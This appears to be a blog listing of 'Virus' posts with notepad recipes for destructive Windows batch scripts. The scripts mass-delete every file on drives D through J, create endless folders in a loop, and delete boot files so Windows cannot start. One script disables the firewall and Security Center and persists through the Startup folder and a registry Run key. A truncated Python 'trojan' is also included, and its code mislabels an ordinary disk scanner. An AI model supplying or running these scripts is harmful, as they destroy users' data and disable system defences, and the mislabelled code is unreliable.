Posts

Showing posts with the label Virus

Deleting All Data Virus

OPEN NOTEPAD TYPE THE FOLLOWING CODE: @echo off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q Save it as  anyname.bat Note: This file deletes all users data except the data present in system drive.

Empty Folders Making Virus

OPEN NOTEPAD TYPE THE FOLLOWING CODE: :virus md %random% goto virus save in "all files" as virus.bat Note:   This will make countless empty folders

How to Delete Windows Files

OPEN NOTEPAD PASTE THE FOLLOWING CODE: @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini Save it as a win.bat Note: It will delete all files that are necessary to start windows.

Auto Shutdown PC Virus

Open in the PC which you want to shutdown automatically. Download Auto Shutdown

Trojen Virus

Trojen Virus Trojans are the most infamous viruses in computer world which can make your PC damn slow and it sometimes also crash the pc. Here we are making a trojan in python language. So let's start 1. Copy and paste the following code in notepad : # tokzikate's trojan import win32file import os def get_drivestats (): #This retrieves the amount of free space on the drive in bytes drive = os.path.splitdrive ( os.getcwd ())[0]. rstrip (':') sectPerCluster , bytesPerSector , freeClusters , totalClusters = \ win32file.GetDiskFreeSpace ( drive + ":\\") free_space = freeClusters * sectPerCluster * bytesPerSector return free_space , drive print ("-"*40) print ("-" + " " * 9 + " Welcome to pyVirScan " + " " * 9 + "-") print ("-" + " " * 2 + "A Virus Scanner written in Python !" + " " * 2 + "-") print ("-" + " "...

Virus For shutting down PC automatically. What virus will do?

Image
Virus For shutti ng down PC automatically. What vir us will do ? *. Copy itself for multiple times. *. This will disable the restore option by deleting the restore file. *. This will disable the login option. *. If this affect the system, then the user can't use his OS longer.   start color 5 title Windows is being corrupted ...                           Idiot ! time 12:00 net stop " Security center " net stop sharedaccess netsh firewall set opmode mode - disable start echo copy %0 >> c:\ autoexec.bat copy %0 c:\ windows \ startm ~1\ Programs \ StartUp \ shroom.bat Attrib +r +h C:\ windows \ startm ~1\ program \ startup \ shroom.bat echo [ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run ] >> c:\ regstart.reg echo " systemStart "="c:\ filename \ virus.bat " >> c:\ regstart.reg start c:\...